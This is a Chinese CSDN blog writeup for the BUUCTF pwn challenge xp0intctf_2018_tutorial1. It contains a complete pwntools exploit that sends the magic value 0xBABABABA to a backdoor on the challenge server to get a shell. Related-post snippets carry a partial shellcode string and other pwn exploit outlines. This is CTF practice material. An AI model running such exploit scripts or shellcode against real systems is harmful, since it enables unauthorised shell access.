BUUCTF pwn xp0intctf_2018_tutorial1

最新推荐文章于 2022-04-23 22:17:48 发布
最新推荐文章于 2022-04-23 22:17:48 发布
阅读量1.1w 收藏 2
点赞数 1
分类专栏: pwn安全 文章标签: shell python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/stareforever/article/details/112347277
版权

查看保护
在这里插入图片描述
用IDA打开查看程序流程
在这里插入图片描述
有后门函数backdoor,可以直接获得shell
在这里插入图片描述
程序逻辑很简单,输入buf使得buf==0xBABABABA即可获得shell
那么直接可以构造payload

在这里插入图片描述
完整ex

from pwn import *

context(log_level='debug')

#io=process("./Xp0intCTF_2018_tutorial1")
io=remote("node3.buuoj.cn",25721)

io.recv()

buf=0xBABABABA

io.sendline(p64(buf))

io.recv()

io.interactive()
求是量子
关注
专栏目录
Xp0intCTF 2017 writeup
P2017118的博客
10-23 1915
SGA 弗拉戈在哪里?
171022 逆向-Xp0intCTF(Re)
whklhhhh的博客
10-23 1054
1625-5 王子昂 总结《2017年10月22日》 【连续第387天总结】 A. Xpoint-暨南大学校赛 B. 今天有点晚了╮(╯_╰)╭推迟到零点结束,最后正好赶着把盲水印给搞定了 明天还有课,今天就先把Re的WP写好吧~明天有空的话写下misc的~ 这次做题都忘了先查壳,还好一个壳都没有2333倍exe直接拖入IDA反编译 找不到入口点和关键函数,直接Shift+f12查找
BUUCTF pwn Xp0intCTF_2018_bof
stareforever的博客
01-11 8796
查看程序保护 保护基本都没开 IDA打开查看程序流程 读入0x18个字符,NAME位置在bss段 然后程序进入到fun1函数,有明显的栈溢出漏洞,溢出长度为0x10,正好可以控制返回地址 主要思想:基本保护都没开,那么可以先在NAME处读入shellcode。后面进入到fun1函数里,利用栈溢出控制程序返回到NAME处 这里shellcode长度最多为0x18 那么可以用 shellcode=b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56
CSAW2016之PWN题目tutorial的解法
HappyOrange2014的专栏
09-27 2003
每次做pwn题目都像破案一样,千头万绪,环环相扣,在凑齐所有线索之后一击致命,非常有意思。但毕竟初学,还需凭着这点兴趣继续努力!该题目是在64bit的linux运行的。用户可以选择3个选项,第一个选项会打印出puts函数的地址,第二个选项存在栈溢出,可以输入shellcode,第三个选项会退出程序。
[BUUCTF-pwn] xp0intctf_2018_gameserver
weixin_52640415的博客
11-17 295
snprintf 函数错用造成栈溢出漏洞 32位程序,没有canary ,又是一个rop的题 先看程序: puts("First, you need to tell me you name?"); fgets(byte_804A180, 256, stdin); v4 = strrchr(byte_804A180, 10); if ( v4 ) *v4 = 0; printf("Hello %s\n", byte_804A180); puts("What's you oc
BUUCTF pwn xp0intctf_2018_tutorial2
stareforever的博客
03-10 189
查看保护 pie没开 IDA打开查看程序流 程序有后门函数backdoor 那么首先读入buf 4字节,使得buf的值为0xdeadbeef 然后再读入v4 4字节,这里使得v4的内容为backdoor的地址 而程序是64位的,可以用p32进行输入 完整ex from pwn import * context(log_level='debug') #io=process("./Xp0intCTF_2018_tutorial2") io=remote("node3.buuoj.cn",26963)
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 459
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 357
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4104
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1011
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF_PWN_test_your_nc详细题解
qq_46238551的博客
10-20 3136
test_your_nc_1 IDA PRO查看主函数 发现system("/bin/sh"),从主函数进入则执行getshell,所以直接nc或者写一个交互程序都可以getshell。 gdb动态分析,b main下主函数断点,r运行,看一下跳转到system函数后具体的执行过程 n单步执行,将程序调整到运行system函数之前 n单步执行,运行system(“/bin/sh”),观察getshell 本地gdb调试成功后,运行exp拿到flag exp.py ``..
Pwntools的context设置与shellcode
半岛铁盒的博客
02-27 4614
文章目录一、context二、汇编与shellcode简单的例子???? 一、context context 是 pwntools 用来设置环境的功能。在很多时候,由于二进制文件的情况不同,我们可能需要进行一些环境设置才能够正常运行exp,比如有一些需要进行汇编,但是32的汇编和64的汇编不同,如果不设置context会导致一些问题。 一般来说我们设置context只需要简单的一句话: context(os='linux', arch='amd64', log_level='debug') 或者 con
Xp0int2016新生杯CTF-writeup
sherlly666的博客
10-30 4431
先说说自己参加这次比赛的感受吧,虽然说只是一次校内的比赛,但是它于我的意义却远不止如此。CTF这个字眼,之前对于我来说一直是“可远观而不可亵玩焉”的感觉,这次算是初次接触,为期两周的比赛,从前端网页的基础知识到底层汇编、逆向、破解等,比赛所涉及的知识网络无疑是庞大的,可以说是自学效率最高的一次= =,话不多说,写了下wp,也算是记录一下这次经历吧。比赛地址:http://www.giantbranc
BUUCTF pwn qctf_2018_dice_game
热门推荐
stareforever的博客
12-25 3万+
查看保护 程序流程 输入name后 连续猜对50次随机数即可获得flag 输入buf的可以覆盖栈上的内容,那么输入0x50个字符就可以覆盖seed,最终产生的随机数就是定值了 考虑输入0x50个‘A’,那么写c程序 可以获得生成的随机数列表 3, 3, 2, 1, 5, 3, 4, 6, 3, 4, 2, 2, 3, 2, 1, 1, 4, 5, 4, 6, 3, 6, 4, 3, 4, 2, 2, 6, 1, 2, 2, 3, 4, 1, 2, 1, 4, 5, 4, 6, 6, 5, 1, 3,
pwn题bbctf_2020_fmt_me
stareforever的博客
12-21 2万+
BUUCTF pwn题bbctf_2020_fmt_me 题目流程 snprintf 格式化漏洞 用gdb查看第一个参数的内容即可观察 参数位置在bss 0x4040a0 偏移为6 那么依据题目的意思 可以将atoi 改为system_plt; 将system_got改为main返回再次输入/bin/sh获得shell 完整ex.py ...
XCTF 攻防世界 pwn CGfsb
stareforever的博客
12-22 2万+
XCTF 攻防世界 pwn CGfsb 题目流程 printf(&s) 明显的format string 漏洞 修改pwnme的值为8 完整的ex
BUUCTF pwn 鹏城杯_2018_code
stareforever的博客
12-28 2万+
查看保护 程序流程 先输入name,然后通过对输入的字符串进行检测,通过后进入到have_fun()函数 check_str()函数要求输入的字符串ascii码在[65,90],[97,122],即字符‘A’-‘Z’和’a’-’z’; 另一个函数要求如下结果 这里可以写相应的python代码进行爆破(时间太长,可以测试查看规律) 相应的结果如下 可以发现结果是递增的,并且 那么可以猜测进行测试 确定第一个为w,后面以从类推 那么输入‘wyBTs’即可成功通过检测 进入到have_fu
BUUCTF pwn 安洵杯_2018_neko
stareforever的博客
12-23 2万+
查看保护 PIE和canary都没开 IDA打开,查看程序流程 先输入’y’或’Y’进入play函数 read存在栈溢出漏洞,cancary保护没开,可以直接溢出 溢出距离为0xd0 程序有后门 但这没有效果 那么可以先把puts函数的地址打印出来,求得libc的基地址,然后再求相应的‘/bin/sh’地址,system地址源程序有提供,第二次溢出时就可以获得shell 完整ex ...
BUUCTF pwn Runit&&RunitPlusPlus
stareforever的博客
01-13 1万+
[BSidesCF 2019]Runit 查看保护 IDA查看程序流 读入buf并执行,那么可以写入shellcode 完整ex from pwn import * context(log_level='debug') #io=process("./runit") io=remote("node3.buuoj.cn",28430) io.recv() payload=asm(shellcraft.sh()) io.send(payload) io.interactive() [BSid
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值